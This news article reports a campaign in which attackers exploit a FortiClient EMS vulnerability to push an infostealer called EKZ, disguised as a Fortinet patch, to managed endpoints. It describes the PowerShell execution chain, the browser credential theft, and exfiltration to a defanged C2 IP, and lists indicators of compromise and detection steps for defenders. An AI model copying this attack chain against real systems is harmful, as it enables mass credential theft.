FortiClient EMS Exploited to Push Fake Patch That Steals Credentials

Attackers have found a devastating way to weaponize compromised FortiClient EMS servers: using Fortinet's own endpoint management features to push credential-stealing malware disguised as a legitimate security patch.

Arctic Wolf Labs identified the campaign this week, documenting how threat actors exploit CVE-2026-35616 to gain administrative access to FortiClient EMS deployments, then abuse the platform's built-in capabilities to distribute malware across every managed endpoint. The approach turns a trusted security tool into a mass infection vector.

Trusted Infrastructure, Weaponized

The attack begins with exploitation of CVE-2026-35616, the pre-authentication API bypass that Fortinet patched in early April. Attackers who compromise an EMS server gain administrative privileges without needing credentials—and with those privileges comes control over every endpoint the server manages.

Rather than deploying obvious malicious payloads, the threat actors modified several configurations to blend in:

• Deferred firmware upgrade reminders to avoid alerting users
• Altered Remote Access Profile settings
• Injected malicious scripts into endpoint policies

"Threat actors used FortiClient's own management pathway to push malicious PowerShell commands to managed endpoints," Arctic Wolf researchers noted, describing how the attacks mimicked legitimate administrative operations.

Once an attacker controls the EMS configuration, every managed endpoint becomes a potential execution target without requiring a separate intrusion path for each device.

EKZ Infostealer: The Payload

The campaign delivers a previously unreported Windows information stealer that Arctic Wolf dubbed "EKZ." The malware arrives on endpoints disguised as FortiEndpoint_Patch.exe—a filename designed to appear as a routine Fortinet security update.

The execution chain leverages trusted components:

1. fortitray.exe (a legitimate FortiClient component) launches a .cmd script file
2. The script executes Base64-encoded PowerShell commands
3. PowerShell downloads and runs the EKZ stealer payload

This approach abuses the trust relationship between FortiClient components. Security tools often whitelist vendor executables, allowing the malicious script to execute without triggering endpoint detection.

EKZ harvests credentials from multiple sources:

• Passwords and cookies from Chromium-based browsers (Chrome, Edge, Brave)
• Passwords and cookies from Gecko-based browsers (Firefox)
• Autofill data including credit card numbers, addresses, and phone numbers

The credential theft capabilities mirror those seen in other recent infostealer campaigns, including the fake OpenAI privacy filter on Hugging Face that racked up 244,000 downloads before detection.

The stealer writes captured data to a log file in the ProgramData directory. Since EKZ lacks native network exfiltration capabilities, the same PowerShell script handles data transmission—sending stolen credentials via HTTP POST requests to attacker infrastructure at 83.138.53[.]110.

Why This Attack Matters

Endpoint management platforms represent high-value targets precisely because they're designed to push configurations and software to large numbers of devices. When attackers compromise that trust relationship, the blast radius expands exponentially.

The FortiClient EMS attack demonstrates a pattern that's becoming more common: rather than compromising endpoints one by one, sophisticated actors seek out infrastructure that already has legitimate access to multiple systems. A single EMS compromise can potentially infect hundreds or thousands of managed endpoints simultaneously.

This marks the second major exploitation wave targeting FortiClient EMS this year. The earlier SQL injection vulnerability (CVE-2026-21643) saw active exploitation in March, and CISA added CVE-2026-35616 to its KEV catalog in April with an unusually aggressive three-day remediation deadline for federal agencies.

Detection and Response

Organizations running FortiClient EMS should assume compromise if they operated vulnerable versions (7.4.5 or 7.4.6) before applying April's hotfixes.

Immediate actions:

1. Hunt for EKZ indicators — Search managed endpoints for FortiEndpoint_Patch.exe in unexpected locations
2. Review ProgramData directories — Look for suspicious log files containing credential data
3. Analyze network traffic — Check for connections to 83.138.53[.]110
4. Audit EMS configurations — Review policy changes and Remote Access Profile modifications since March 31
5. Check PowerShell logs — Look for Base64-encoded execution launched via fortitray.exe

Indicators of Compromise:

Type	Value
C2 IP	83.138.53[.]110
Malicious filename	FortiEndpoint_Patch.exe
Execution parent	fortitray.exe
Staging location	ProgramData directory

For organizations still running vulnerable EMS versions, FortiClient EMS 7.4.7 contains the permanent fix. Hotfixes remain available for 7.4.5 and 7.4.6 deployments. Given confirmed malware distribution through this vector, patching alone isn't sufficient—incident response investigation is warranted.

Broader Implications

The EKZ campaign highlights why endpoint management security matters. These platforms exist in a position of extraordinary trust—they're authorized to modify configurations, deploy software, and execute commands across managed device fleets. That same trust makes them devastating when compromised.

Understanding how infostealers work helps organizations recognize the signs of credential theft before attackers monetize stolen data. The EKZ stealer follows patterns common to modern infostealers: targeting browser credential stores, harvesting autofill data, and exfiltrating through simple HTTP mechanisms.

Fortinet acknowledged active exploitation when releasing the CVE-2026-35616 patches. The progression from vulnerability disclosure to weaponized malware campaign took roughly seven weeks—a timeline that underscores why organizations treating patch delays as acceptable risk need to recalibrate. Attackers aren't waiting for convenient maintenance windows.

The EKZ campaign joins a busy week for credential theft operations—security researchers also uncovered malicious npm packages impersonating Claude AI designed to steal GitHub tokens. For the latest on emerging threats, follow our hacking news coverage.